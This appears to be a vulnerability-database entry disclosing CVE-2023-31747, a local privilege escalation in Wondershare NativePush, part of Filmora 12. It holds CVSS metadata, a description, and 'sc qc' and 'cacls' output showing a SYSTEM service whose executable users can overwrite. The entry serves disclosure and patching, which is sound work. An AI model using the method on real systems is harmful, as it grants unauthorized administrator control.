Lucene search
Thurein Soe1337DAY-ID-38732HistoryMay 26, 2023 - 12:00 a.m.
Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation Vulnerability
2023-05-2600:00:00
Thurein Soe
0day.today
211
vulnerability
filmora 12
unquoted service paths
privilege escalation
wondershare nativepush
service paths vulnerability
local privilege escalation
windows operating system
system privilege
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
26.4%
# Exploit Title: Filmora 12 version ( Build 1.0.0.7) - Unquoted Service Paths Privilege Escalation
# Exploit Author: Thurein Soe
# Vendor Homepage: https://filmora.wondershare.com
# Software Link: https://mega.nz/file/tQNGGZTQ#E1u20rdbT4R3pgSoUBG93IPAXqesJ5yyn6T8RlMFxaE
# Version: Filmora 12 ( Build 1.0.0.7)
# Tested on: Windows 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31747
Vulnerability description:
Filmora is a professional video editing software. Wondershare NativePush
Build 1.0.0.7 was part of Filmora 12 (Build 12.2.1.2088). Wondershare
NativePush Build 1.0.0.7 was installed while Filmora 12 was installed. The
service name "NativePushService" was vulnerable to unquoted service paths
vulnerability which led to full local privilege escalation in the affected
window operating system as the service "NativePushService" was running with
system privilege that the local user has write access to the directory
where the service is located. Effectively, the local user is able to
elevate to local admin upon successfully replacing the affected executable.
C:\sc qc NativePushService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: NativePushService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME :
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Wondershare Native Push Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\cacls "C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe"
C:\Users\HninKayThayar\AppData\Local\Wondershare\Wondershare
NativePush\WsNativePushService.exe
BUILTIN\Users:(ID)F
NT AUTHORITY\SYSTEM:(ID)F
BUILTIN\Administrators:(ID)F
HNINKAYTHAYAR\HninKayThayar:(ID)F
Related
cve
cve
CVE-2023-31747
2023-05-23 23:15:09
nvd
nvd
CVE-2023-31747
2023-05-23 23:15:09
prion
prion
Design/Logic Flaw
2023-05-23 23:15:00
packetstorm
packetstorm
Filmora 12 Build 1.0.0.7 Unquoted Service Path
2023-05-19 00:00:00
cvelist
cvelist
CVE-2023-31747
2023-05-23 00:00:00
zdt
zdt
Filmora 12 Build 1.0.0.7 Unquoted Service Path Vulnerability
2023-05-19 00:00:00
exploitdb
exploitdb
openvas
openvas
Microsoft Windows Unquoted Path Vulnerability (SMB Login)
2018-03-23 00:00:00
7.8 High
CVSS3
Attack Vector
LOCAL
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
26.4%
Related for 1337DAY-ID-38732